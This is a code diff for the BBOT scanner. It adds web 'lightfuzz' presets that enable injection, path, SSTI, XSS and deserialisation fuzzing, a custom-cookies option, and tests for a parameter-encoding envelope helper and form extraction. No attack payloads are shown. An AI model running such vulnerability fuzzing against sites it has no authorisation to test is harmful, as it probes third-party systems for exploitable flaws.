[cmdi,crypto,nosqli,path,serial,sqli,ssti,xss] + disable_post: False + excavate: + retain_querystring: True + +conditions: + - | + {% if config.web.spider_distance == 0 %} + {{ warn("The lightfuzz-intense preset works much better with spider enabled! Consider adding 'spider' or 'spider-intense' preset.") }} + {% endif %} \ No newline at end of file diff --git a/bbot/presets/web/lightfuzz-max.yml b/bbot/presets/web/lightfuzz-max.yml new file mode 100644 index 0000000000..1f788bec5b --- /dev/null +++ b/bbot/presets/web/lightfuzz-max.yml @@ -0,0 +1,31 @@ +description: Discover web parameters and lightly fuzz them for vulnerabilities, with the most intense discovery techniques + +flags: + - web-paramminer + +modules: + - httpx + - lightfuzz + - robots + - badsecrets + - hunt + - reflected_parameters + - portfilter + +config: + url_querystring_remove: False + url_querystring_collapse: False + modules: + lightfuzz: + force_common_headers: True + enabled_submodules: [cmdi,crypto,nosqli,path,serial,sqli,ssti,xss] + disable_post: False + excavate: + retain_querystring: True + speculate_params: True + +conditions: +- | + {% if config.web.spider_distance == 0 %} + {{ warn("The lightfuzz-max preset works much better with spider enabled! Consider adding 'spider' or 'spider-intense' preset.") }} + {% endif %} \ No newline at end of file diff --git a/bbot/presets/web/lightfuzz-min.yml b/bbot/presets/web/lightfuzz-min.yml new file mode 100644 index 0000000000..b8247b6f59 --- /dev/null +++ b/bbot/presets/web/lightfuzz-min.yml @@ -0,0 +1,23 @@ +description: Discover web parameters and lightly fuzz them for vulnerabilities, with only the most common vulnerabilities and minimal extra modules + +modules: + - httpx + - lightfuzz + - portfilter + +config: + url_querystring_remove: False + url_querystring_collapse: True + modules: + lightfuzz: + force_common_headers: False + enabled_submodules: [path,sqli,xss] # only look for the most common vulnerabilities + disable_post: True + excavate: + retain_querystring: True + +conditions: +- | + {% if config.web.spider_distance == 0 %} + {{ warn("The lightfuzz-min preset works much better with spider enabled! Consider adding 'spider' or 'spider-intense' preset.") }} + {% endif %} \ No newline at end of file diff --git a/bbot/presets/web/lightfuzz-xss.yml b/bbot/presets/web/lightfuzz-xss.yml new file mode 100644 index 0000000000..cc6bc9bbc8 --- /dev/null +++ b/bbot/presets/web/lightfuzz-xss.yml @@ -0,0 +1,21 @@ +description: Discover web parameters and lightly fuzz them, optimized for looking just for xss vulnerabilities +modules: + - httpx + - lightfuzz + - paramminer_getparams + - reflected_parameters + - portfilter + +config: + url_querystring_remove: False + url_querystring_collapse: False + modules: + lightfuzz: + enabled_submodules: [xss] + disable_post: True + +conditions: + - | + {% if config.web.spider_distance == 0 %} + {{ warn("The lightfuzz-xss preset works much better with spider enabled! 
Consider adding 'spider' or 'spider-intense' preset.") }} + {% endif %} \ No newline at end of file diff --git a/bbot/presets/web/lightfuzz.yml b/bbot/presets/web/lightfuzz.yml new file mode 100644 index 0000000000..7ccf0edb3d --- /dev/null +++ b/bbot/presets/web/lightfuzz.yml @@ -0,0 +1,26 @@ +description: Discover web parameters and lightly fuzz them for vulnerabilities, without some of the more intense discovery techniques + +modules: + - httpx + - lightfuzz + - badsecrets + - hunt + - reflected_parameters + - portfilter + +config: + url_querystring_remove: False + url_querystring_collapse: True + modules: + lightfuzz: + force_common_headers: False + enabled_submodules: [cmdi,crypto,nosqli,path,serial,sqli,ssti,xss] + disable_post: True + excavate: + retain_querystring: True + +conditions: + - | + {% if config.web.spider_distance == 0 %} + {{ warn("Lightfuzz works much better with spider enabled! Consider adding 'spider' or 'spider-intense' preset.") }} + {% endif %} \ No newline at end of file diff --git a/bbot/presets/web/paramminer.yml b/bbot/presets/web/paramminer.yml index 7d36e3a849..3057a1b3a9 100644 --- a/bbot/presets/web/paramminer.yml +++ b/bbot/presets/web/paramminer.yml @@ -1,12 +1,15 @@ -description: Discover new web parameters via brute-force +description: Discover new web parameters via brute-force, and analyze them with additional modules flags: - web-paramminer modules: - httpx + - reflected_parameters + - hunt -config: - web: - spider_distance: 1 - spider_depth: 4 +conditions: + - | + {% if config.web.spider_distance == 0 %} + {{ warn("The paramminer preset works much better with spider enabled! Consider adding 'spider' or 'spider-intense' preset.") }} + {% endif %} \ No newline at end of file diff --git a/bbot/scanner/preset/args.py b/bbot/scanner/preset/args.py index a1bf8a693c..7d206d7f3f 100644 --- a/bbot/scanner/preset/args.py +++ b/bbot/scanner/preset/args.py @@ -163,6 +163,9 @@ def preset_from_args(self): if self.parsed.custom_headers: args_preset.core.merge_custom({"web": {"http_headers": self.parsed.custom_headers}}) + if self.parsed.custom_cookies: + args_preset.core.merge_custom({"web": {"http_cookies": self.parsed.custom_cookies}}) + if self.parsed.custom_yara_rules: args_preset.core.merge_custom( {"modules": {"excavate": {"custom_yara_rules": self.parsed.custom_yara_rules}}} @@ -362,6 +365,13 @@ def create_parser(self, *args, **kwargs): default=[], help="List of custom headers as key value pairs (header=value).", ) + misc.add_argument( + "-C", + "--custom-cookies", + nargs="+", + default=[], + help="List of custom cookies as key value pairs (cookie=value).", + ) misc.add_argument("--custom-yara-rules", "-cy", help="Add custom yara rules to excavate") misc.add_argument("--user-agent", "-ua", help="Set the user-agent for all HTTP requests") @@ -407,6 +417,22 @@ def sanitize_args(self): custom_headers_dict[k] = v self.parsed.custom_headers = custom_headers_dict + # Custom Cookie Parsing / Validation + custom_cookies_dict = {} + custom_cookie_example = "Example: --custom-cookies foo=bar foo2=bar2" + + for i in self.parsed.custom_cookies: + parts = i.split("=", 1) + if len(parts) != 2: + raise ValidationError(f"Custom cookies not formatted correctly (missing '='). {custom_cookie_example}") + k, v = parts + if not k or not v: + raise ValidationError( + f"Custom cookies not formatted correctly (missing cookie name or value). 
{custom_cookie_example}" + ) + custom_cookies_dict[k] = v + self.parsed.custom_cookies = custom_cookies_dict + # --fast-mode if self.parsed.fast_mode: self.parsed.preset += ["fast"] diff --git a/bbot/scanner/scanner.py b/bbot/scanner/scanner.py index 01d9654c87..28dd8df56a 100644 --- a/bbot/scanner/scanner.py +++ b/bbot/scanner/scanner.py @@ -213,6 +213,12 @@ def __init__( self.warning( "You have enabled custom HTTP headers. These will be attached to all in-scope requests and all requests made by httpx." ) + # custom HTTP cookies warning + self.custom_http_cookies = self.web_config.get("http_cookies", {}) + if self.custom_http_cookies: + self.warning( + "You have enabled custom HTTP cookies. These will be attached to all in-scope requests and all requests made by httpx." + ) # url file extensions self.url_extension_blacklist = {e.lower() for e in self.config.get("url_extension_blacklist", [])} diff --git a/bbot/test/test_step_1/test__module__tests.py b/bbot/test/test_step_1/test__module__tests.py index e50f67a910..583a9064c4 100644 --- a/bbot/test/test_step_1/test__module__tests.py +++ b/bbot/test/test_step_1/test__module__tests.py @@ -18,7 +18,9 @@ def test__module__tests(): preset = Preset() # make sure each module has a .py file - for module_name in preset.module_loader.preloaded(): + for module_name, preloaded in preset.module_loader.preloaded().items(): + if module_name == "ssti": + log.critical(f"MODULE NAME: {module_name} / {preloaded}") module_name = module_name.lower() assert module_name in module_test_files, f'No test file found for module "{module_name}"' diff --git a/bbot/test/test_step_1/test_helpers.py b/bbot/test/test_step_1/test_helpers.py index 9cec291941..12fb15278f 100644 --- a/bbot/test/test_step_1/test_helpers.py +++ b/bbot/test/test_step_1/test_helpers.py @@ -460,6 +460,13 @@ async def test_helpers_misc(helpers, scan, bbot_scanner, bbot_httpserver): s = "asdf {unused} {used}" assert helpers.safe_format(s, used="fdsa") == "asdf {unused} fdsa" + # is_printable + assert helpers.is_printable("asdf") is True + assert helpers.is_printable(r"""~!@#$^&*()_+=-<>:"?,./;'[]\{}|""") is True + assert helpers.is_printable("ドメイン.テスト") is True + assert helpers.is_printable("4") is True + assert helpers.is_printable("asdf\x00") is False + # punycode assert helpers.smart_encode_punycode("ドメイン.テスト") == "xn--eckwd4c7c.xn--zckzah" assert helpers.smart_decode_punycode("xn--eckwd4c7c.xn--zckzah") == "ドメイン.テスト" diff --git a/bbot/test/test_step_1/test_presets.py b/bbot/test/test_step_1/test_presets.py index a53eb515ff..920bc67d48 100644 --- a/bbot/test/test_step_1/test_presets.py +++ b/bbot/test/test_step_1/test_presets.py @@ -596,7 +596,7 @@ class TestModule1(BaseModule): from bbot.modules.output.base import BaseOutputModule class TestModule2(BaseOutputModule): - pass + watched_events = [] """ ) @@ -607,7 +607,7 @@ class TestModule2(BaseOutputModule): from bbot.modules.internal.base import BaseInternalModule class TestModule3(BaseInternalModule): - pass + watched_events = [] """ ) diff --git a/bbot/test/test_step_1/test_web.py b/bbot/test/test_step_1/test_web.py index 864bd50eea..96079b5f04 100644 --- a/bbot/test/test_step_1/test_web.py +++ b/bbot/test/test_step_1/test_web.py @@ -478,3 +478,23 @@ async def test_web_cookies(bbot_scanner, httpx_mock): assert not client2.cookies await scan._cleanup() + + +@pytest.mark.asyncio +async def test_http_sendcookies(bbot_scanner, bbot_httpserver): + endpoint = "/" + url = bbot_httpserver.url_for(endpoint) + from werkzeug.wrappers import Response + + 
def echo_cookies_handler(request):
+ cookies = request.cookies
+ cookie_str = "; ".join([f"{key}={value}" for key, value in cookies.items()])
+ return Response(f"Echoed Cookies: {cookie_str}\nEchoed Headers: {request.headers}")
+
+ bbot_httpserver.expect_request(uri=endpoint).respond_with_handler(echo_cookies_handler)
+ scan1 = bbot_scanner("127.0.0.1", config={"web": {"debug": True}})
+ r1 = await scan1.helpers.request(url, cookies={"foo": "bar"})
+
+ assert r1 is not None, "Request with custom cookies failed to return a response"
+ assert "bar" in r1.text
+ await scan1._cleanup()
diff --git a/bbot/test/test_step_1/test_web_envelopes.py b/bbot/test/test_step_1/test_web_envelopes.py
new file mode 100644
index 0000000000..a9dcae9433
--- /dev/null
+++ b/bbot/test/test_step_1/test_web_envelopes.py
@@ -0,0 +1,343 @@
+import pytest
+
+
+async def test_web_envelopes():
+ from bbot.core.helpers.web.envelopes import (
+ BaseEnvelope,
+ TextEnvelope,
+ HexEnvelope,
+ B64Envelope,
+ JSONEnvelope,
+ XMLEnvelope,
+ URLEnvelope,
+ )
+
+ # simple text
+ text_envelope = BaseEnvelope.detect("foo")
+ assert isinstance(text_envelope, TextEnvelope)
+ assert text_envelope.unpacked_data() == "foo"
+ assert text_envelope.subparams == {"__default__": "foo"}
+ expected_subparams = [([], "foo")]
+ assert list(text_envelope.get_subparams()) == expected_subparams
+ for subparam, value in expected_subparams:
+ assert text_envelope.get_subparam(subparam) == value
+ assert text_envelope.pack() == "foo"
+ assert text_envelope.num_envelopes == 0
+ assert text_envelope.get_subparam() == "foo"
+ text_envelope.set_subparam(value="bar")
+ assert text_envelope.get_subparam() == "bar"
+ assert text_envelope.unpacked_data() == "bar"
+
+ # simple binary
+ # binary_envelope = BaseEnvelope.detect("foo\x00")
+ # assert isinstance(binary_envelope, BinaryEnvelope)
+ # assert binary_envelope.unpacked_data == "foo\x00"
+ # assert binary_envelope.packed_data == "foo\x00"
+ # assert binary_envelope.subparams == {"__default__": "foo\x00"}
+
+ # text encoded as hex
+ hex_envelope = BaseEnvelope.detect("706172616d")
+ assert isinstance(hex_envelope, HexEnvelope)
+ assert hex_envelope.unpacked_data(recursive=True) == "param"
+ hex_inner_envelope = hex_envelope.unpacked_data(recursive=False)
+ assert isinstance(hex_inner_envelope, TextEnvelope)
+ assert hex_inner_envelope.unpacked_data(recursive=False) == "param"
+ assert hex_inner_envelope.unpacked_data(recursive=True) == "param"
+ assert list(hex_envelope.get_subparams(recursive=False)) == [([], hex_inner_envelope)]
+ assert list(hex_envelope.get_subparams(recursive=True)) == [([], "param")]
+ assert hex_inner_envelope.unpacked_data() == "param"
+ assert hex_inner_envelope.subparams == {"__default__": "param"}
+ expected_subparams = [([], "param")]
+ assert list(hex_inner_envelope.get_subparams()) == expected_subparams
+ for subparam, value in expected_subparams:
+ assert hex_inner_envelope.get_subparam(subparam) == value
+ assert hex_envelope.pack() == "706172616d"
+ assert hex_envelope.num_envelopes == 1
+ assert hex_envelope.get_subparam() == "param"
+ hex_envelope.set_subparam(value="asdf")
+ assert hex_envelope.get_subparam() == "asdf"
+ assert hex_envelope.unpacked_data() == "asdf"
+ assert hex_envelope.pack() == "61736466"
+
+ # text encoded as base64
+ base64_envelope = BaseEnvelope.detect("cGFyYW0=")
+ assert isinstance(base64_envelope, B64Envelope)
+ assert base64_envelope.unpacked_data() == "param"
+ base64_inner_envelope =
base64_envelope.unpacked_data(recursive=False) + assert isinstance(base64_inner_envelope, TextEnvelope) + assert list(base64_envelope.get_subparams(recursive=False)) == [([], base64_inner_envelope)] + assert list(base64_envelope.get_subparams()) == [([], "param")] + assert base64_inner_envelope.pack() == "param" + assert base64_inner_envelope.unpacked_data() == "param" + assert base64_inner_envelope.subparams == {"__default__": "param"} + expected_subparams = [([], "param")] + assert list(base64_inner_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert base64_inner_envelope.get_subparam(subparam) == value + assert base64_envelope.num_envelopes == 1 + base64_envelope.set_subparam(value="asdf") + assert base64_envelope.get_subparam() == "asdf" + assert base64_envelope.unpacked_data() == "asdf" + assert base64_envelope.pack() == "YXNkZg==" + + # test inside hex inside base64 + hex_envelope = BaseEnvelope.detect("634746795957303d") + assert isinstance(hex_envelope, HexEnvelope) + assert hex_envelope.get_subparam() == "param" + assert hex_envelope.unpacked_data() == "param" + base64_envelope = hex_envelope.unpacked_data(recursive=False) + assert isinstance(base64_envelope, B64Envelope) + assert base64_envelope.get_subparam() == "param" + assert base64_envelope.unpacked_data() == "param" + text_envelope = base64_envelope.unpacked_data(recursive=False) + assert isinstance(text_envelope, TextEnvelope) + assert text_envelope.get_subparam() == "param" + assert text_envelope.unpacked_data() == "param" + hex_envelope.set_subparam(value="asdf") + assert hex_envelope.get_subparam() == "asdf" + assert hex_envelope.unpacked_data() == "asdf" + assert text_envelope.get_subparam() == "asdf" + assert text_envelope.unpacked_data() == "asdf" + assert base64_envelope.get_subparam() == "asdf" + assert base64_envelope.unpacked_data() == "asdf" + + # URL-encoded text + url_encoded_envelope = BaseEnvelope.detect("a%20b%20c") + assert isinstance(url_encoded_envelope, URLEnvelope) + assert url_encoded_envelope.pack() == "a%20b%20c" + assert url_encoded_envelope.unpacked_data() == "a b c" + url_inner_envelope = url_encoded_envelope.unpacked_data(recursive=False) + assert isinstance(url_inner_envelope, TextEnvelope) + assert url_inner_envelope.unpacked_data(recursive=False) == "a b c" + assert url_inner_envelope.unpacked_data(recursive=True) == "a b c" + assert list(url_encoded_envelope.get_subparams(recursive=False)) == [([], url_inner_envelope)] + assert list(url_encoded_envelope.get_subparams(recursive=True)) == [([], "a b c")] + assert url_inner_envelope.pack() == "a b c" + assert url_inner_envelope.unpacked_data() == "a b c" + assert url_inner_envelope.subparams == {"__default__": "a b c"} + expected_subparams = [([], "a b c")] + assert list(url_inner_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert url_inner_envelope.get_subparam(subparam) == value + assert url_encoded_envelope.num_envelopes == 1 + url_encoded_envelope.set_subparam(value="a s d f") + assert url_encoded_envelope.get_subparam() == "a s d f" + assert url_encoded_envelope.unpacked_data() == "a s d f" + assert url_encoded_envelope.pack() == "a%20s%20d%20f" + + # json + json_envelope = BaseEnvelope.detect('{"param1": "val1", "param2": {"param3": "val3"}}') + assert isinstance(json_envelope, JSONEnvelope) + assert json_envelope.pack() == '{"param1": "val1", "param2": {"param3": "val3"}}' + assert json_envelope.unpacked_data() == {"param1": "val1", 
"param2": {"param3": "val3"}} + assert json_envelope.unpacked_data(recursive=False) == {"param1": "val1", "param2": {"param3": "val3"}} + assert json_envelope.unpacked_data(recursive=True) == {"param1": "val1", "param2": {"param3": "val3"}} + assert json_envelope.subparams == {"param1": "val1", "param2": {"param3": "val3"}} + expected_subparams = [ + (["param1"], "val1"), + (["param2", "param3"], "val3"), + ] + assert list(json_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert json_envelope.get_subparam(subparam) == value + json_envelope.selected_subparam = ["param2", "param3"] + assert json_envelope.get_subparam() == "val3" + assert json_envelope.num_envelopes == 1 + + # prevent json over-detection + just_a_string = BaseEnvelope.detect("10") + assert not isinstance(just_a_string, JSONEnvelope) + + # xml + xml_envelope = BaseEnvelope.detect( + 'val1val3' + ) + assert isinstance(xml_envelope, XMLEnvelope) + assert ( + xml_envelope.pack() + == '\nval1val3' + ) + assert xml_envelope.unpacked_data() == { + "root": {"param1": {"@attr": "attr1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + assert xml_envelope.unpacked_data(recursive=False) == { + "root": {"param1": {"@attr": "attr1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + assert xml_envelope.unpacked_data(recursive=True) == { + "root": {"param1": {"@attr": "attr1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + assert xml_envelope.subparams == { + "root": {"param1": {"@attr": "attr1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + expected_subparams = [ + (["root", "param1", "@attr"], "attr1"), + (["root", "param1", "#text"], "val1"), + (["root", "param2", "param3"], "val3"), + ] + assert list(xml_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert xml_envelope.get_subparam(subparam) == value + assert xml_envelope.num_envelopes == 1 + + # json inside base64 + base64_json_envelope = BaseEnvelope.detect("eyJwYXJhbTEiOiAidmFsMSIsICJwYXJhbTIiOiB7InBhcmFtMyI6ICJ2YWwzIn19") + assert isinstance(base64_json_envelope, B64Envelope) + assert base64_json_envelope.pack() == "eyJwYXJhbTEiOiAidmFsMSIsICJwYXJhbTIiOiB7InBhcmFtMyI6ICJ2YWwzIn19" + assert base64_json_envelope.unpacked_data() == {"param1": "val1", "param2": {"param3": "val3"}} + base64_inner_envelope = base64_json_envelope.unpacked_data(recursive=False) + assert isinstance(base64_inner_envelope, JSONEnvelope) + assert base64_inner_envelope.pack() == '{"param1": "val1", "param2": {"param3": "val3"}}' + assert base64_inner_envelope.unpacked_data() == {"param1": "val1", "param2": {"param3": "val3"}} + assert base64_inner_envelope.subparams == {"param1": "val1", "param2": {"param3": "val3"}} + expected_subparams = [ + (["param1"], "val1"), + (["param2", "param3"], "val3"), + ] + assert list(base64_json_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert base64_json_envelope.get_subparam(subparam) == value + assert base64_json_envelope.num_envelopes == 2 + with pytest.raises(ValueError): + assert base64_json_envelope.get_subparam() + base64_json_envelope.selected_subparam = ["param2", "param3"] + assert base64_json_envelope.get_subparam() == "val3" + + # xml inside url inside hex inside base64 + nested_xml_envelope = BaseEnvelope.detect( + 
"MjUzMzYzMjUzNzMyMjUzNjY2MjUzNjY2MjUzNzM0MjUzMzY1MjUzMzYzMjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMxMjUzMjMwMjUzNjMxMjUzNzM0MjUzNzM0MjUzNzMyMjUzMzY0MjUzMjMyMjUzNzM2MjUzNjMxMjUzNjYzMjUzMzMxMjUzMjMyMjUzMzY1MjUzNzM2MjUzNjMxMjUzNjYzMjUzMzMxMjUzMzYzMjUzMjY2MjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMxMjUzMzY1MjUzMzYzMjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMyMjUzMzY1MjUzMzYzMjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMzMjUzMzY1MjUzNzM2MjUzNjMxMjUzNjYzMjUzMzMzMjUzMzYzMjUzMjY2MjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMzMjUzMzY1MjUzMzYzMjUzMjY2MjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMyMjUzMzY1MjUzMzYzMjUzMjY2MjUzNzMyMjUzNjY2MjUzNjY2MjUzNzM0MjUzMzY1" + ) + assert isinstance(nested_xml_envelope, B64Envelope) + assert nested_xml_envelope.unpacked_data() == { + "root": {"param1": {"@attr": "val1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + assert ( + nested_xml_envelope.pack() + == "MjUzMzQzMjUzMzQ2Nzg2ZDZjMjUzMjMwNzY2NTcyNzM2OTZmNmUyNTMzNDQyNTMyMzIzMTJlMzAyNTMyMzIyNTMyMzA2NTZlNjM2ZjY0Njk2ZTY3MjUzMzQ0MjUzMjMyNzU3NDY2MmQzODI1MzIzMjI1MzM0NjI1MzM0NTI1MzA0MTI1MzM0MzcyNmY2Zjc0MjUzMzQ1MjUzMzQzNzA2MTcyNjE2ZDMxMjUzMjMwNjE3NDc0NzIyNTMzNDQyNTMyMzI3NjYxNmMzMTI1MzIzMjI1MzM0NTc2NjE2YzMxMjUzMzQzMmY3MDYxNzI2MTZkMzEyNTMzNDUyNTMzNDM3MDYxNzI2MTZkMzIyNTMzNDUyNTMzNDM3MDYxNzI2MTZkMzMyNTMzNDU3NjYxNmMzMzI1MzM0MzJmNzA2MTcyNjE2ZDMzMjUzMzQ1MjUzMzQzMmY3MDYxNzI2MTZkMzIyNTMzNDUyNTMzNDMyZjcyNmY2Zjc0MjUzMzQ1" + ) + inner_hex_envelope = nested_xml_envelope.unpacked_data(recursive=False) + assert isinstance(inner_hex_envelope, HexEnvelope) + assert ( + inner_hex_envelope.pack() + == "253343253346786d6c25323076657273696f6e253344253232312e30253232253230656e636f64696e672533442532327574662d38253232253346253345253041253343726f6f74253345253343706172616d312532306174747225334425323276616c3125323225334576616c312533432f706172616d31253345253343706172616d32253345253343706172616d3325334576616c332533432f706172616d332533452533432f706172616d322533452533432f726f6f74253345" + ) + inner_url_envelope = inner_hex_envelope.unpacked_data(recursive=False) + assert isinstance(inner_url_envelope, URLEnvelope) + assert ( + inner_url_envelope.pack() + == r"%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22utf-8%22%3F%3E%0A%3Croot%3E%3Cparam1%20attr%3D%22val1%22%3Eval1%3C/param1%3E%3Cparam2%3E%3Cparam3%3Eval3%3C/param3%3E%3C/param2%3E%3C/root%3E" + ) + inner_xml_envelope = inner_url_envelope.unpacked_data(recursive=False) + assert isinstance(inner_xml_envelope, XMLEnvelope) + assert ( + inner_xml_envelope.pack() + == '\nval1val3' + ) + assert inner_xml_envelope.unpacked_data() == { + "root": {"param1": {"@attr": "val1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + assert inner_xml_envelope.subparams == { + "root": {"param1": {"@attr": "val1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + expected_subparams = [ + (["root", "param1", "@attr"], "val1"), + (["root", "param1", "#text"], "val1"), + (["root", "param2", "param3"], "val3"), + ] + assert list(nested_xml_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert nested_xml_envelope.get_subparam(subparam) == value + assert nested_xml_envelope.num_envelopes == 4 + + # manipulating text inside hex + hex_envelope = BaseEnvelope.detect("706172616d") + expected_subparams = [([], "param")] + assert list(hex_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert hex_envelope.get_subparam(subparam) == value + hex_envelope.set_subparam([], "asdf") + expected_subparams = [([], 
"asdf")] + assert list(hex_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert hex_envelope.get_subparam(subparam) == value + assert hex_envelope.unpacked_data() == "asdf" + + # manipulating json inside base64 + base64_json_envelope = BaseEnvelope.detect("eyJwYXJhbTEiOiAidmFsMSIsICJwYXJhbTIiOiB7InBhcmFtMyI6ICJ2YWwzIn19") + expected_subparams = [ + (["param1"], "val1"), + (["param2", "param3"], "val3"), + ] + assert list(base64_json_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert base64_json_envelope.get_subparam(subparam) == value + base64_json_envelope.set_subparam(["param1"], {"asdf": [None], "fdsa": 1.0}) + expected_subparams = [ + (["param1", "asdf"], [None]), + (["param1", "fdsa"], 1.0), + (["param2", "param3"], "val3"), + ] + assert list(base64_json_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert base64_json_envelope.get_subparam(subparam) == value + base64_json_envelope.set_subparam(["param2", "param3"], {"1234": [None], "4321": 1.0}) + expected_subparams = [ + (["param1", "asdf"], [None]), + (["param1", "fdsa"], 1.0), + (["param2", "param3", "1234"], [None]), + (["param2", "param3", "4321"], 1.0), + ] + assert list(base64_json_envelope.get_subparams()) == expected_subparams + base64_json_envelope.set_subparam(["param2"], None) + expected_subparams = [ + (["param1", "asdf"], [None]), + (["param1", "fdsa"], 1.0), + (["param2"], None), + ] + assert list(base64_json_envelope.get_subparams()) == expected_subparams + + # xml inside url inside base64 + xml_envelope = BaseEnvelope.detect( + "JTNDP3htbCUyMHZlcnNpb249JTIyMS4wJTIyJTIwZW5jb2Rpbmc9JTIydXRmLTglMjI/JTNFJTBBJTNDcm9vdCUzRSUzQ3BhcmFtMSUyMGF0dHI9JTIydmFsMSUyMiUzRXZhbDElM0MvcGFyYW0xJTNFJTNDcGFyYW0yJTNFJTNDcGFyYW0zJTNFdmFsMyUzQy9wYXJhbTMlM0UlM0MvcGFyYW0yJTNFJTNDL3Jvb3QlM0U=" + ) + assert ( + xml_envelope.pack() + == "JTNDJTNGeG1sJTIwdmVyc2lvbiUzRCUyMjEuMCUyMiUyMGVuY29kaW5nJTNEJTIydXRmLTglMjIlM0YlM0UlMEElM0Nyb290JTNFJTNDcGFyYW0xJTIwYXR0ciUzRCUyMnZhbDElMjIlM0V2YWwxJTNDL3BhcmFtMSUzRSUzQ3BhcmFtMiUzRSUzQ3BhcmFtMyUzRXZhbDMlM0MvcGFyYW0zJTNFJTNDL3BhcmFtMiUzRSUzQy9yb290JTNF" + ) + expected_subparams = [ + (["root", "param1", "@attr"], "val1"), + (["root", "param1", "#text"], "val1"), + (["root", "param2", "param3"], "val3"), + ] + assert list(xml_envelope.get_subparams()) == expected_subparams + xml_envelope.set_subparam(["root", "param1", "@attr"], "asdf") + expected_subparams = [ + (["root", "param1", "@attr"], "asdf"), + (["root", "param1", "#text"], "val1"), + (["root", "param2", "param3"], "val3"), + ] + assert list(xml_envelope.get_subparams()) == expected_subparams + assert ( + xml_envelope.pack() + == "JTNDJTNGeG1sJTIwdmVyc2lvbiUzRCUyMjEuMCUyMiUyMGVuY29kaW5nJTNEJTIydXRmLTglMjIlM0YlM0UlMEElM0Nyb290JTNFJTNDcGFyYW0xJTIwYXR0ciUzRCUyMmFzZGYlMjIlM0V2YWwxJTNDL3BhcmFtMSUzRSUzQ3BhcmFtMiUzRSUzQ3BhcmFtMyUzRXZhbDMlM0MvcGFyYW0zJTNFJTNDL3BhcmFtMiUzRSUzQy9yb290JTNF" + ) + xml_envelope.set_subparam(["root", "param2", "param3"], {"1234": [None], "4321": 1.0}) + expected_subparams = [ + (["root", "param1", "@attr"], "asdf"), + (["root", "param1", "#text"], "val1"), + (["root", "param2", "param3", "1234"], [None]), + (["root", "param2", "param3", "4321"], 1.0), + ] + assert list(xml_envelope.get_subparams()) == expected_subparams + + # null + null_envelope = BaseEnvelope.detect("null") + assert isinstance(null_envelope, JSONEnvelope) + assert null_envelope.unpacked_data() is None + assert 
null_envelope.pack() == "null" + expected_subparams = [([], None)] + assert list(null_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert null_envelope.get_subparam(subparam) == value + + tiny_base64 = BaseEnvelope.detect("YWJi") + assert isinstance(tiny_base64, TextEnvelope) diff --git a/bbot/test/test_step_2/module_tests/test_module_excavate.py b/bbot/test/test_step_2/module_tests/test_module_excavate.py index 1e1e8db436..5703fbefb9 100644 --- a/bbot/test/test_step_2/module_tests/test_module_excavate.py +++ b/bbot/test/test_step_2/module_tests/test_module_excavate.py @@ -139,7 +139,7 @@ async def setup_before_prep(self, module_test): def check(self, module_test, events): root_relative_detection = False page_relative_detection_1 = False - page_relative_detection_1 = False + page_relative_detection_2 = False root_page_confusion_1 = False root_page_confusion_2 = False @@ -457,26 +457,38 @@ class TestExcavateParameterExtraction(TestExcavate): $.post("/test", {jquerypost: "value2"}); -

Simple GET Form

Use the form below to submit a GET request:

-

+

+

Simple POST Form

Use the form below to submit a POST request:

-

+

+

+ +
+

Simple Generic Form

+

Use the form below to submit a request:

+
+ +

Links

href img - + """ @@ -489,12 +501,19 @@ def check(self, module_test, events): found_jquery_post = False found_form_get = False found_form_post = False + found_form_generic = False found_jquery_get_original_value = False found_jquery_post_original_value = False found_form_get_original_value = False found_form_post_original_value = False + found_form_generic_original_value = False found_htmltags_a = False found_htmltags_img = False + found_select_noquotes = False + avoid_truncated_values = True + found_form_input_with_spaces = False + found_form_get_additional_params = False + found_form_post_additional_params = False for e in events: if e.type == "WEB_PARAMETER": @@ -508,15 +527,24 @@ def check(self, module_test, events): if e.data["original_value"] == "value2": found_jquery_post_original_value = True - if e.data["description"] == "HTTP Extracted Parameter [q] (GET Form Submodule)": + if e.data["description"] == "HTTP Extracted Parameter [q1] (GET Form Submodule)": found_form_get = True if e.data["original_value"] == "flowers": found_form_get_original_value = True + if "q4" in e.data["additional_params"].keys(): + found_form_get_additional_params = True - if e.data["description"] == "HTTP Extracted Parameter [q] (POST Form Submodule)": + if e.data["description"] == "HTTP Extracted Parameter [q2] (POST Form Submodule)": found_form_post = True if e.data["original_value"] == "boats": found_form_post_original_value = True + if "q5" in e.data["additional_params"].keys(): + found_form_post_additional_params = True + + if e.data["description"] == "HTTP Extracted Parameter [q3] (Generic Form Submodule)": + found_form_generic = True + if e.data["original_value"] == "candles": + found_form_generic_original_value = True if e.data["description"] == "HTTP Extracted Parameter [age] (HTML Tags Submodule)": if e.data["original_value"] == "456": @@ -528,16 +556,164 @@ def check(self, module_test, events): if "fit" in e.data["additional_params"].keys(): found_htmltags_img = True + if ( + e.data["description"] + == "HTTP Extracted Parameter [blog-post-author-display] (POST Form Submodule)" + ): + if e.data["original_value"] == "user.name": + if "csrf" in e.data["additional_params"].keys(): + found_select_noquotes = True 